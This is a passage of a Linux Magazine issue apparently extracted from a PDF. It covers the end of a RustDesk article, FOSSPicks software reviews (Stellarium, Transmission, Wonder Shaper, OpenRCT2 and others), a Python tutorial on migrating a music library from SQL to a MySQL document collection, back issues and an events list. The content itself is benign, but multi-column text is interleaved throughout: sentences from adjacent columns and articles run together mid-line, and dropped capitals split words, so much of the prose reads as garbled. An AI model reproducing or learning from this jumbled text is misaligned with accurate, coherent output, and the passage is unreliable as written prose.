mote desktop appears after logging in, just like [3] RustDesk download: https://github.com/
it does using the local program. To access the rustdesk/rustdesk/releases
settings, click on the small arrow bottom right in [4] Xorg Server dummy configuration:
the display. After doing so, a bar appears where https://techoverflow.net/2019/02/23/how-to-
you can adjust the screen display, among other run-x-server-using-xserver-xorg-video-
things, just like with the desktop client. In test- dummy-driver-on-ubuntu/
ing, this feature worked surprisingly well, but
[5] HDMI dummy plug:
you have to expect a certain latency, which
https://a.co/d/1vxKJo8
[6] RustDesk web client:
Listing 1: Starting the Server http://web.rustdesk.com/#/
$ ./hbbs -r <Relay-Server-IP:Port>

$ ./hbbr
[7] Configuring RustDesk server:
https://rustdesk.com/docs/en/self-host/

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 85

LINUX VOICE FOSSPICKS

FOSSPicks Sparkling gems and new

releases from the world of
Free and Open Source Software

Graham has discovered he can mask his complete tuning and scale configura-
tions. The top half of the
inability to play or perform music by pretending to tune main window contains its
and play things with custom scales. BY GRAHAM MORRISON synthesizer, written by de-
veloper Paul Walker in a
Tuning and scale creation weekend, that offers great

Tuning Workbench Synth

sound with minimal control.
Beneath this is the tuning
section, which is split into
usical scales can seem none of the notes will fit any scale experimentation, letting any two. A table on the left con-

M deceptively simple, es-

pecially if you know a
little bit about sound frequencies
with mathematical perfection. Our
brains instead compensate for the
small differences.
of us play with scales and
venture into completely
new music territory. One of
tains notes, their names,
exact frequencies, and in-
terval scale, and on the
and harmonics. Doubling a Tuning experimentation is nor- the oldest and most well- right, either the Scala or
sound’s frequency transposes its mally restricted by a musical in- established pieces of soft- KBM input and output file.
pitch by an octave, which must strument’s physical properties and ware for playing with scales Any of this can be changed
imply that scales can be con- whatever is used to generate a is Scala, an open source while sound is playing; you’ll
structed from pure mathematics. sound (e.g., strings, skins, or platform for tuning experi- hear the results immedi-
While true, this won’t result in a reeds). This experimentation flour- mentation. It’s powerful but ately. But the real magic ap-
scale that’s pleasing to the ear or ishes in many non-Western cul- dated and not at all intuitive pears when you click on Ad-
capable of being played on a real tures, where instruments are var- or spontaneous, but its scl vanced, which shows a
instrument. A piano splits (tem- ied, and the piano doesn’t have file format has become the much more intuitive visual-
pers) the frequency difference in a such a grip on music tradition. But de facto standard for shar- ization of the current tuning,
doubled pitch into 12, for example, without the hardware, tuning is dif- ing tuning configuration. using points distributed
in a tuning called equal tempera- ficult to study and almost impossi- This is why it’s so refresh- around a central axis to
ment. Equal temperament is bril- ble to use outside of a cultural ing to find the more mod- show the various intervals
liant for playing different scales context. Fortunately, computers ern, slick, and accessible in an octave. You can drag
with the same set of notes, but and synthesizers can help with Tuning Workbench Synth. It these points with a single
was created by some of the click to change the intervals
developers behind the and pitch. As with the tun-
equally amazing Surge XT ing tables, you hear any
synth who early on realized changes in real time. It’s
they’d created a reference perfect for creating and
implementation for micro- tweaking scales. You don’t
tuning. This in turn led to need to know anything
the creation of a tuning li- about the theory to gener-
brary now used by many ate very interesting results,
open source and proprie- which can then be saved as
tary applications, including Scala or KBM files for use in
Surge, Dexed, Odin, the Be- other applications. Best of
spoke modular, and sfizz all, Surge XT has started to
synthesizers. Tuning Work- incorporate many of these
bench Synth became the features and tuning ele-
reference implementation ments into its interface,
1. VCOs: Quick access to the simple tone generators makes it easier to hear tuning differ- for testing the library, and making it the best of both
ences. 2. Synth: A beautiful synth with limited controls is included. 3. Tuning table: Every consequently became an worlds.
tuning change updates this table immediately, showing notes, names, frequencies, and
audio plugin with best-in-
functional intervals. 4. Scala and KBM support: Scala and KBM tuning descriptions are
also updated in real time and can be both imported and exported. 5. Graph view: This class tuning and microtun- Project Website
view is the easiest way to see and edit the interval and scale configuration. 6. Intervals: ing capabilities. Everything https://github.com/
Set the number of intervals and the differences between them manually. 7. Scale genera- in the view is about playing surge-synthesizer/
tors: Use dials and divisions to automatically generate a scale. with and hearing different tuning-workbench-synth

86 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 FOSSPICKS LINUX VOICE

Astronomy

Stellarium 1.0
round 20 years ago, one source space simulation on the

A of the first articles I wrote

for a magazine was a
roundup of Linux astronomy soft-
Linux desktop or even on the
macOS desktop, Windows,
iPhone, Android, or a web browser.
ware. I was particularly enthusias- Stellarium is now everywhere.
tic about astronomy, and I was For the uninitiated, Stellarium is
easily able to run through the pop- a virtual planetarium that will sim-
ular tools of the time: Celestia, ulate the night sky above you or
Xplanet, KStars, and Cartes du any other place on Earth, either for
Ciel. I thought I’d done a good job. tonight or any other time in the
But a month went by, and the past or future. It’s a celestial hot- Stellarium is one of the first major open source applications to move
emails started to arrive. Why body time machine that generates to using Qt 6, soon to be followed by KDE Plasma!
hadn’t I looked at Stellarium? I was realistic renders of the sky, plan-
aghast. I’d forgotten to include ets, nebulae, and other astronomi- new skylight model, and there’s better dithering, observation
what was, even then, the best cal phenomena and can even ap- lists, and high-DPI support. It’s an incredible application, fea-
space simulation on the Linux proximate your local terrain and turing the corona surrounding realistic eclipses, the rings
desktop. Twenty years later and I sky conditions. You’d think they’d around Saturn, and the moon’s ever-moving terminus. It can
won’t make the same mistake have every feature covered by help anyone understand the worlds above them, regardless
again. Stellarium has finally now, but 1.0 is still a major update. of whether they have access to a telescope, a pair of binocu-
achieved a 1.0 release. It’s a re- Most notably, Stellarium now uses lars, or even an unpolluted view of the night sky.
markable achievement that Qt 6, with Qt 5 reaching the end of
should be celebrated because its supported life. The main view is Project Website
Stellarium 1.0 is still the best open also much improved, thanks to a https://stellarium.org

BitTorrent client

Transmission 4
ransmission is another client you use, but for many of

T one of those projects

that has been around for
so long it’s become part of the
us, Transmission has been our
cross-platform torrent client of
choice.
vocabulary. This is especially sig- More than adding new features,
nificant considering Transmis- this major release focuses on con-
sion is a BitTorrent client, a tech- solidation. First in terms of perfor-
nology whose popularity ebbs mance and then with code clarity
and flows almost as much as and future proofing. Thanks to an
crypto. As Linux users, however, extensive campaign to test the
we have always had strong legiti- performance of every bit of its Transmission’s GTK user interface has been ported to gtkmm,
mate uses for BitTorrent be- code, the project has improved thanks to the project’s migration to C++.
cause we often deal with both CPU performance by 50 percent
large files and projects that are and memory performance by 70 new support for BitTorrent v2 using SHA-256 and hash
self-funded and self-hosted. Bit- percent. Part of the same process trees, a new web client with mobile support, and more
Torrent enables us to not only was migrating the code from C to user-agent protection. There’s still excellent desktop sup-
download those files without in- a much more standardized C++, port, with both GTK and Qt clients, and of course you can
curring hardship on the up- with unit tests, safeguarding the still run it from the command line too. The end result is a
stream project, but it also con- project for the future. Even the BitTorrent client fit for the next 20 years, and one of the
tributes in a small way by keep- project’s approach to community few independent protocols that thrives outside the in-
ing a torrent seeding after a has been rebooted, with promises creasingly controlled World Wide Web.
download has completed, help- of more engagement and no more
ing other people access the tumbleweeds. There are a few Project Website
same files. This is true whatever tangible new features too, with https://github.com/transmission/

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 87

LINUX VOICE FOSSPICKS

Console text editor

mle
e look at a lot of text scarcity does not affect usability.

W editors, and the major-

ity of them are built for
the command line. This is surpris-
After running from your terminal,
mle looks and operates like a fully
fledged and perfectly capable edi-
ing considering how well estab- tor. The low typing latency and re-
lished Emacs and Vim are – sponse feel fantastic, and it’s all
they’ve both been around for de- expandable, scriptable, and com-
cades, as has our collective mus- pletely configurable.
cle memory for using them. But The main view looks like a ter- Mle is a rare breed of tiny text editor that is also powerful. It can
developers must feel there’s still minal editor with the numbers even be built as a static binary for easy portability and compatibility.
room for improvement because feature turned on. It suffers from
they keep creating new editors, the ancient Vim problem of not highlighting, keycap layers, macros, regular expressions for
and that’s the case with mle. helping the user at all, but stan- search and replace, and the ability to load very large files.
Compared to Emacs and Vim, dard desktop shortcuts work for Rather than reinvent many wheels, extra functionality is
mle is a tiny project with a tiny co- most functions. Ctrl+X will quit, piped to external tools and incorporated in the main appli-
debase. But this is also its unique for example, while F2 will load the cation, such as movement via less, fuzzy search with fzf,
selling point, plus the ability to help text into the editor. This is a file browsing with tree, and searching with grep. These
easily hack on the code, which is great place to start, followed tools are seamlessly integrated with the main application,
what differentiates mle from its maybe by Alt+V to split the view and using external tools like this is a refreshing approach.
inspirations. The main project vertically and start working on Even cynical editor stalwarts can’t help but be impressed.
code is only 10,000 lines of code, your own documents while the
which is remarkable. The best help text remains visible. But built- Project Website
thing about mle is that code in, mle supports syntax https://github.com/adsr/mle

Server automation

sake
inux is now so easy to in- jobs. And this is where sake can

L stall it’s perhaps become

too easy to end up with a
small library of Linux servers, all
help – not so much the alcoholic
Japanese beverage (although
that can sometimes help too),
performing different tasks but this brilliant little command-
around the house or office. There line tool with the same name.
might be a Raspberry Pi for Functioning as your recipe
home automation, a NUC for book of commands commonly Easily run commands and retrieve their output on one or more
NAS, or an old laptop for media run over SSH, sake allows you to servers with sake.
playback. Each will need to be preconfigure these commands
connected to and manually up- with variables and execute them themselves, the servers you want them to run, and how
dated, fixed, or reconfigured as directly from the tool without you want to parse the output. Servers can be singular, a
time goes on. There are all kinds making any connections your- list, or groups, and this is where sake is at its most pow-
of orchestration tools that can be self. Most importantly, you can erful. Creating a single command, such as rsync for a
used to make cross-server auto- use groups and wildcard match- backup, is powerful, but being able to run that command
mation jobs easier, but these are ing to run those commands on automatically on multiple machines feels liberating, es-
usually intended for server multiple servers at once. But its pecially without learning anything or studying a manual.
rooms, data silos, or for people best feature is being able to do This is a big contrast to tools like Puppet or Ansible,
with a lot of patience with read- all this while remaining easy to which are all-conquering but require some time invest-
ing documentation. There’s not understand because everything ment. Sake is server automation for the rest of us.
so much choice for smaller de- is configured from a single YAML
ployments beyond writing your configuration file. This file de- Project Website
own scripts and running cron fines the commands https://github.com/alajmo/sake

88 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 FOSSPICKS LINUX VOICE

Terminal music

MusicPlayerPlus
usicPlayerPlus is an analyzer, all within a freshly config-

M unusual project. Rather

than being a single exe-
cutable, it’s a suite of command-
ured tmux server session. Other
bundled tools include beets to
manage your media library, mopidy
line tools and utilities to help you to serve your music remotely, fzf
listen to and enjoy music from the for search, and yams to track your
terminal. Each tool is a preexisting listening on Last.fm.
project in its own right and is de- Alongside mpcplus, the mppcover
veloped independently of Music- command shows cover art, the
PlayerPlus, but the suite also in- mppsplash command creates One word of warning if you do install MusicPlayerPlus: Back up any
cludes incredibly useful initializa- ASCII art with fractal exploration existing tmux configuration, because it will be overwritten.
tion routines, configuration op- and plasma flames, and the blis-
tions, and settings that attempt to sify command creates playlists, run various tools together. Thanks to everything being built
remain consistent across all the while fzmp provides a search inter- around MPD, it’s also easy to integrate with Bandcamp,
tools being used. This is why the face for your music collection. It SoundCloud, and other online audio sources, all from the
first thing you do after installation can seem like a disparate collec- command line. There are even Raspberry Pi packages for
is run the bespoke initialization tion of tools, but it’s convenient installation without any other dependencies, and this is
script. This scans your local direc- being able to install them from a where MusicPlayerPlus works best – hidden in a cupboard
tories and sets up the configura- single package and use a single somewhere running on a Raspberry Pi connected to your
tion files. After that, typing mpplus initialization command to pre-con- music system with a high-quality DAC.
launches the mpcplus MPD client figure everything to work together.
alongside the mpd music player They work well when you edit a Project Website
daemon and the cava spectrum tmux session to split the view and https://github.com/doctorfree/MusicPlayerPlus

Bandwidth control

Wonder Shaper
ith so many of us now tool that can save your job if you

W working from home,

our Internet connec-
tions have become more than just
need to attend an important meet-
ing while the rest of the household
is trying to make sense of The
delivery mechanisms for online Rings of Power in 4K HDR.
distractions. They’ve become our Wonder Shaper isn’t a separate
commutes and our offices, and utility but a script you run from the
while most people have enough command line, because the Linux
bandwidth to cope, many more of kernel already includes all the fea-
us need to carefully juggle down- tures you need to limit a network
loads and movie streaming with connection using “Traffic Control.” If you’ve always been intimidated by the kernel level traffic shaping
our video meetings and company Traffic Control even has its own command tc, Wonder Shaper is the answer.
town halls. This is where a router’s command, tc, which can be used
quality of service (QoS) settings to perform all kinds of network (ingress and egress, in network terminology), and it works
can really help because they en- shaping. But as you might imag- brilliantly. It’s perfect if you have a machine downloading up-
able you to prioritize certain de- ine for a tool that interfaces with dates, for example, or on a laptop being used for Netflix. By
vices or protocols over others. But both the kernel and your network running ./wondershaper -a eth0 -u 4096 -d 8192 on either
not all routers have this feature, packets, it can be difficult to use device, you limit upload and download speeds to 4Mbps
and there are surprisingly few and can easily have negative con- and 8Mbps respectively, and running the script again with
other options if you need to limit sequences. Wonder Shaper is a different values will change those limits immediately.
the bandwidth on some of your front end to this complexity, allow-
computers. However, Wonder ing you to set simple limits for in- Project Website
Shaper is one of them, and it’s a coming and outgoing data https://github.com/magnific0/wondershaper

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 89

LINUX VOICE FOSSPICKS

Noise generator

Samplebrain
t’s not often that a cutting- audio files can be

I edge musician helps to cre-

ate a piece of open source
audio software, but that’s exactly
imported individ-
ually or as the
contents of a di-
what has happened with the re- rectory, and the
lease of Samplebrain. The musi- processing works
cian involved is Aphex Twin, a best if they’re
genre-creating iconoclast of short, percussive,
electronic music who has dab- and cover a vari-
bled in everything from ambient ety of timbres
drones and atmospherics, and sounds. To prepare you for what the output sounds like, here’s a spectrogram and frequency
through transcendent MIDI-trig- These become map of the typical output.
gered piano pieces, to glitchy in- the contents of
dustrial noise. And if you know the brain, and Samplebrain cre- mono sources. The output can
anything about Aphex Twin, ates a model of those sounds by then be mixed with the input, and
you’ll know it’s the latter that has cutting and connecting together you can save the recording as
dominated his recent output. You the fragments that contain simi- you tweak the values in real time
should also be prepared for the lar harmonics. It then analyzes so that the output represents a
kind of sounds Samplebrain can the target file and attempts to kind of live glitchy performance.
make. Samplebrain isn’t an audio swap out sections with similar- The amount of disjointedness
application to help you sound sounding slices in the brain. The can be manipulated by adjusting
like Erik Satie or Johann Sebas- result is something that pre- the many attributes littered
tian Bach. Instead, it’s the kind of serves an essence of the original throughout the main window.
application that’s going to sum- inputs while at the same time You can change the algorithm
mon the local dog population completely transforming them used to match the sample
with its disjointed output of high into a cloud of disjointed noise. blocks, the size of the blocks,
pitch noise and distortion, but if It’s a mix between the sound of a and the levels of “novelty,” “bore-
you’re into experimental elec- broken optical drive, a ZX Spec- dom,” and “stickiness” to help en-
tronic music, that is not such a trum loading screen, digital alias- sure similar blocks aren’t re-
bad thing. ing, pitch shifting, and the ultra peated. Getting a reasonable
Samplebrain operates on two quick millisecond repeats of a sound takes considerable effort
different kinds of audio file in- granular synth. You can even and luck, but it’s also a lot of fun.
puts. One is a set of audio sam- manipulate the live input from a Small tweaks to irrelevant pa-
ples, and the other is the long file microphone and produce a ste- rameters create huge changes in
you wish to process. The set of reo sound cloud of noise from the output, and you can almost
perform those changes live to
turn Samplebrain into an impro-
vised audio mangling effect. This
is likely the original intention, be-
cause it’s also possible to re-
motely control these values
using OSC, a protocol often used
to automate modern synths and
lighting. That would allow Aphex
Twin to twiddle with the sound
remotely alongside his rank of
synthesizers and Eurorack mod-
ules and mixers, which is where
the output from Samplebrain
best fits.

Project Website
Samplebrain transforms perfectly recorded audio into something that sounds broken, https://gitlab.com/then-try-this/
incoherent, and totally unintentional, which must surely have been the intention. samplebrain

90 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 FOSSPICKS LINUX VOICE

360-degree platformer

ROTA
he Godot games engine picked and either learned from or

T has improved rapidly over

recent months, thanks to
both huge investment and chang-
used directly as the foundation
for a new game. ROTA, however,
is now one such title.
ing market conditions. Many ROTA is a two-dimensional plat-
game developers are looking for form where the background world
alternatives to Unity, for example, is rotated 360 degrees as you
while others want to find a solu- travel over 90-degree bends in the
tion that won’t shoehorn them terrain. It features beautiful, car- ROTA is available to buy and demo on Steam, but it’s also an open
into an unaccountable subscrip- toon-pixel-art-style graphics, ad- source project that can be loaded and edited in Godot.
tion-based system. Godot is gain- dictive gameplay, and exception-
ing momentum and is set to be- ally smooth animation. Each level particular, and wanted to pay something back. The source
come a major open source proj- is a problem that needs to be includes media, maps, and world designs, with the source
ect in the same league as Blender, solved as you navigate and move folder containing everything created in Godot. It’s a brilliant
Firefox, and Linux itself. While between worlds. Most importantly, way to study the game’s movement, physics, and pixel-per-
there have been a number of however, its main developer has fect collision mechanics, and the developer has even cre-
commercial games that were cre- been inspired to release the proj- ated a YouTube video on how to edit or create your own lev-
ated in Godot, there have been ect as open source – assets and els in Godot. This might be the perfect way to get started in
very few that were sold and re- all. This was because they had pre- games development, and the best possible way of starting
leased as open source. This has viously learnt so much from open to learn your way around Godot.
deprived the Godot community of source games related using the
some much-needed commercial PICO-8 games engine, and the bril- Project Website
game exemplars that can be liantly tough platform Celeste in https://github.com/HarmonyHoney/ROTA

Open roller coasters

OpenRCT2
t’s amazing just how many old reimplementation of the games

I games have been re-imple-

mented in new and wholly
compatible open source games
engine behind the brilliant Roller-
Coaster Tycoon 2, originally re-
leased over 20 years ago in Octo-
engines, just to keep those old ber 2002. To get it to work, you
games alive. It’s a huge and thank- will need the original data files,
less task, at least early on in devel- and OpenRCT2 will work with
opment when the programmers files from RollerCoaster Tycoon
have to pull apart what’s publicly 1 and 2, as well as their various
available, including data and save expansion packs. These are still
files, and try to recreate the same available through Steam and Forget costly fast passes and getting there early, create your own
functionality without resorting to GOG. The game itself is still a roller coaster park with OpenRCT2.
the original code. This is why so peerless roller coaster park simu-
many open source recreations lation, letting you design every- old park scenarios. It’s a game that’s a lot of fun beyond
only ever reach a preliminary level thing from the rides themselves, the usual nostalgia factor of playing yet another game
of compatibility, but there are also accompanying attractions, and from your youth, and it will also appeal to just about any
a few exceptional cases that man- the overall site. OpenRCT2 not indie or retro game fanatic who may enjoy Minecraft, or
age to go above and beyond the only fixes all the bugs found in who has stumbled onto the brilliant but costly Roller-
software that spawned them. the originals, but also lets you in- Coaster Tycoon 3 on the Nintendo Switch. They can
Open RollerCoaster Tycoon 2 crease the number of guests, now run OpenRCT2 on their Steam Decks forever.
(OpenRCT2) is one of them. adds new track elements and
It’s not too difficult to guess zero-g rolls, adds differing color Project Website
that OpenRCT2 is a schemes, and is compatible with https://github.com/OpenRCT2

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 91

LINUX VOICE TUTORIAL – SQL DATABASE MIGRATION

Three steps from SQL to a document database

Migrating Music
Use a Python API to migrate a music library from SQL to a NoSQL document database.

n this article, I will show you how I used a schema. Document databases do not require

I
BY JOHN COFIELD
Python application programming interface each document to have the same fields (though
(API) to migrate my music library from an they can). In fact, it is possible to have different
SQL relational database to a NoSQL document fields in each document throughout the data-
database. Using the Python X DevAPI in the base. That flexibility is one of the key advantages
MySQL Shell application, I will highlight some of a document store over a relational store. It is
basics about document databases, the Python the reason I decided to migrate, because it al-
methods that I used, and the database tool that lows me to easily add new metadata to my
enables migration. Readers who should get the music library. That could include metadata such
most out of this article are those that have as artist background information, song credits,
some basic familiarity with the structured query and/or other miscellaneous metadata that may
language (SQL) and with the Python program- not be immediately available.
ming language.
What Is a JSON Document?
Why Migrate from SQL to Document? In many document store systems, documents
I have my existing personal music library in an are JavaScript Object Notation (JSON) objects,
SQL relational database containing music meta- or JSON-like objects. JSON is becoming in-
data – artist, song title, album title, track number, creasingly popular as a standard for data inter-
genre, release year – that I want to migrate to a change and storage and is beginning to replace
document database. For the purpose of this arti- the Extensible Markup Language (XML) as a
cle, I will use a few examples from my library dominant data exchange format, particularly for
(Figure 1). music metadata. JSON documents are light-
SQL relational databases have been dominant weight, language-independent, and human read-
for decades, making up 60 percent of the data- able. In short, JSON documents are elegant in
base market in 2019 according to a ScaleGrid Da- their simplicity. Many popular music APIs pro-
tabase Trends report. In recent years, use of docu- vide JSON-formatted metadata. These APIs in-
ment databases has increased, largely driven by clude Amazon, Apple Music, Spotify, Sound-
the requirements of big data. One of the criticisms Cloud, and others.
of relational databases is that their schema is The JSON format eases development since it is
rigid. All data fields must be defined in advance object-oriented and easier to parse than XML, be-
with identical fields in every row in a table, making cause JSON documents are comprised of a
it difficult to make schema changes later. comma-separated list of one or more key-value
By contrast, document store databases, some- pairs. The simplest form of a JSON document is
times referred to as NoSQL, do not have a fixed {key:value}. You will note that this is the same

Figure 1: Sample table of songs from my SQL library.

92 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 TUTORIAL – SQL DATABASE MIGRATION LINUX VOICE

form as a Python dictionary. From a software de- my_session = mysqlx.get_session( <URI> )

velopment perspective, JSON is well suited to ob- my_database = my_session.get_schema('my_db')

ject-oriented programming languages such as Py-

thon, JavaScript, and others. The first step in the migration process is to create
Let’s consider that we have a simple docu- the target collection:
ment case containing an artist name and album
name. The document instance would be defined doc_collection1 = my_database.create_collectionU

as follows: ('my_collection1')

{"Artist" : "Quincy Jones", "Album" : "Q's Jook U In the statement above, I’ve created a collection
Joint"} object named my_collection1 using the create_
collection() method and assigned it to doc_col-
A group of related documents is referred to as a lection1, which will be the target document collec-
collection. As an analogy between a relational da- tion. I will subsequently add, update, or remove
tabase and a document database, a table in a re- documents as necessary.
lational database is equivalent to a collection in a In the next step, I need to extract my metadata
document database. Each row in a table is equiv- from the source SQL database. This metadata is
alent to a document in the collection, and each in a table named sql_table. To extract data in a
field name (column) in a table is equivalent to a table row, I execute the statements below:
key in a document.
table_result = sql_table.select().execute()

API Methods for Database Migration table_2document = table_result.fetch_one_object()

Now that we know what a document store is, I’ll

show you how to use a Python API to migrate a re- In the code above, the select() method is analo-
lational database to a document database. My gous to the SELECT statement in SQL. It returns a
source database was created with MySQL, so I result that is a list of rows. Next, I need to fetch
used the X DevAPI interface in the MySQL Shell each row, convert it to a JSON object, and add it
8.0 application, which allows me to access both to my collection. The fetch_one_object() method
tables and documents in a database. fetches a row from the table as a JSON object.
To accomplish my goal, I’ll use table methods to The table_2document result object shows the
access data in tables, and document methods to key:value strings of the metadata fetched from
build and verify my documents. Three steps are one row of the table (see Figure 2). While there
required to migrate data: 1) create a collection, 2) is a fetch_one() method that could fetch a
fetch rows from a table, and 3) add fetched rows table row, the result is not a JSON object and
to the document collection. therefore cannot be added directly to a docu-
Table methods used: ment. Note that SQL statements executed
through the X DevAPI must end with the exe-
# Returns a dataset with rows cute() function because they are executed only
table.select() when that function is called. If omitted, the
# Returns a dictionary/json object statement will be ignored.
result.fetch_one_object() In the third step, each table_2document fetched
from my_table is then added to doc_collection1
Document methods used: with the add() method which adds a JSON docu- Figure 2: Fetch a JSON doc-
ment to a collection: ument from a SQL table.
# Inserts a document into a collection

collection.add() doc_collection1.add(table_2document).execute()

# Returns dataset with all documents in a collection

collection.find()

The Process
The three steps that I identified above assume
that the relational database exists, that a data-
base connection has already been established,
and the source table exists. Before starting the
migration process, I’m assuming that a connec-
tion to the database has already been made and
that the following instances already exist:

# Session instance

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 93

LINUX VOICE TUTORIAL – SQL DATABASE MIGRATION

(%) wildcard can be used in the search condition

Listing 1:Migrate a Complete SQL Table string for these methods, as illustrated with the
table_result = sql_table.select().execute()
remove() method in the example below. In addi-
table_2document = table_result.fetch_one_object() tion, note that I have used explicit strings in the
while table_2document: modify() and set() methods to simplify the ex-
doc_collection1.add(table_2document).execute()
amples and to keep the focus on function. It is
however, good practice to use parameterized
table_2document = table_result.fetch_one_object()
placeholders instead of explicit strings.

Build Collection doc_collection1.modify("Artist = 'Santana'").setU

With these three basic steps, I can add a single ("Artist", "Carlos Santana")

document to doc_collection1. To migrate the en- doc_collection1.remove("Artist like 'Quincy%'")

tire SQL table to a collection, the code below iter-

ates through each row in the table with the add() For a more comprehensive list of available create,
method (see Listing 1) remove, update, and delete (CRUD) methods, see
The result in Figure 3 shows two of the five the MySQL 8.0 Reference Manual.
documents added to doc_collection1. You will
notice that there is an extra _id field that is au- Finally
tomatically added to each document. It is a vir- If you want to use Python to automate the cre-
tual index that MySQL automatically adds to ation and maintenance of your music library
each document in a collection. See the MySQL and want to be able to access music metadata
8.0 manual [1] for more information on docu- from a wide variety of sources, most deliver
ment indexing. content in JSON format. Because document
store databases tend to be based on the JSON
Document Updates format or a JSON-like format, and music meta-
After I have migrated my SQL table to the docu- data is widely available in that format, choosing
ment collection, I will continue to either build on it JSON as a preferred format is a logical choice.
with new metadata documents, update incorrect If your personal music library is in an existing
or incomplete documents, or remove documents. SQL database and you are considering docu-
As we have already seen, I can use the add() ment store as an option, this article may help
method to add new documents to my library or you along your migration path. Q Q Q
simply add new fields (key-value pairs), effectively
changing the schema on the fly. Info
If, for example, I need to change the spelling
Figure 3: Sample of docu- of an artist’s name, I can use the doc_collec- [1] MySQL 8.0 Reference Manual:
ments added to collection. tion1.modify() method. Note that the percent https://dev.mysql.com/doc/refman/8.0/en/

The Author
John Cofield is a retired
software marketing man-
ager in Northern California.
His training is in electrical
engineering, and he has
worked at multiple Silicon
Valley semiconductor
and software companies.
His nontechnical interests include Jazz
music, ranging from Modal to Fusion.

QQQ

94 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 SERVICE
Back Issues

LINUX
NEWSSTAND Order online:
https://bit.ly/Linux-Newsstand

Linux Magazine is your guide to the world of Linux. Monthly issues are packed with advanced technical
articles and tutorials you won't find anywhere else. Explore our full catalog of back issues for specific
topics or to complete your collection.
#265/December 2022
Quantum Computing
Most Linux users know that this futuristic technology leverages the weird power of quantum
mechanics. But how does it really work? What can I do with it? Are there tools available today
that will help me experiment? This month we take a deep dive into quantum computing.
On the DVD: Manjaro 21.3.7-220816 and Arch Linux 2022.10.01

#264/November 2022
Artificial Intelligence
Machine learning remains shrouded in mystery even though it is now an integral part of our
everyday world. This month we look behind the curtain at some popular techniques for
supervised and unsupervised learning.
On the DVD: Debian 11.5 and Rocky Linux 9.0

#263/October 2022
Build an IoT Linux
The most amazing thing about Linux is its flexibility. Linux systems run on the biggest computers
in the world – and on many of the diminutive devices that populate your home environment. If
you’ve always wondered how developers adapt Linux to run on tiny tech, you’ll appreciate this
month’s stories on Buildroot and the Yocto project.
On the DVD: Linux Magazine Archive issues 1-262
#262/September 2022
Beyond 5G
Behind the scenes, the cellular phone network has always been the preserve of highly specialized
and proprietary equipment, but some recent innovations could be changing that. This month we
explore the Open RAN specification, which could one day allow more of the mobile phone
network to operate on off-the-shelf hardware.
On the DVD: openSUSE Leap 15.4 and MX Linux 21.1
#261/August 2022
USB Boot
Live boot was such an exciting idea 15 years ago – just carry a CD with you and boot from
anywhere. But old-style boot CDs had some limitations. Today’s USB boot tools solve those
problems plus offer a feature that no one even thought about back then: access to several
boot images on a single stick.
On the DVD: Linux Mint MATE 20.3 and FreeBSD 13.1
#260/July 2022
Privacy
If you are really serious about privacy, you’ll need to lean on more than your browser’s no
tracking button. Those who need anonymity the most depend on the Tor network – a global
project offering safe surfing even in surveillance states. We also look at Portmaster, an application
firewall with some useful privacy features.
On the DVD: Ubuntu 22.04 and Fedora Workstation 36

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 95

SERVICE
Events

FEATURED
EVENTS
Users, developers, and vendors meet at Linux events around the world.
We at Linux Magazine are proud to sponsor the Featured Events shown here.
For other events near you, check our extensive events calendar online at
https://www.linux-magazine.com/events.
If you know of another Linux event you would like us to add to our calendar,
please send a message with all the details to [email protected].

NOTICE FOSDEM 2023 GeekBeacon Festival

Date: February 4-5, 2023 Date: February 18, 2023
Be sure to check the event
website before booking any Location: Brussels, Belgium Location: Virtual Event
travel, as many events are Website: https://fosdem.org/2023/ Website: https://gbfest.org/
being canceled or converted
FOSDEM is a free event for software GeekBeacon Festival’s mission is to
to virtual events due to the developers to meet, share ideas and unify geeks and make the world a better
effects of COVID-19. collaborate. Every year, thousands of place through Mental Health, Gaming,
developers of free and open source Open Culture, and Open Source. We’ll be
software from all over the world gather featuring speakers, presentations,
at the event in Brussels. Join us discussions, giveaways, and more to be
February 4-5 for lightning talks, announced. Join us from your screen
devrooms, lectures, and more! February 18, 2023.

Events
FOSDEM 2023 Feb. 4-5 Brussels, Belgium https://fosdem.org/2023/

ITEXPO Feb. 14-17 Fort Lauderdale, Florida https://www.itexpo.com/east/

DeveloperWeek Feb. 15-23 San Francisco, California + Virtual https://www.developerweek.com/

GeekBeacon Festival Feb. 18 Virtual Event https://gbfest.org/

FAST'23 Feb. 20-23 Santa Clara, California https://www.usenix.org/conference/fast23

SCaLE 20x Mar. 9-12 Pasadena, California https://www.socallinuxexpo.org/blog/scale-20x

Cassandra Summit Mar. 13-14 San Jose, California + Virtual https://events.linuxfoundation.org/

FOSS Backstage 2023 Mar. 13-14 Berlin, Germany + Online https://23.foss-backstage.de/

Everything Open 2023 Mar. 14-16 Naarm (Melbourne), Australia https://2023.everythingopen.au/

Women in CyberSecurity Mar. 16-18 Denver, Colorado https://www.wicys.org/events/wicys-2023/

CloudFest Mar. 21-23 Europa-Park, Germany https://www.cloudfest.com/

Images © Alex White, 123RF.com

KubeCon + CloudNativeCon Apr. 17-21 Amsterdam, Netherlands https://events.linuxfoundation.org/

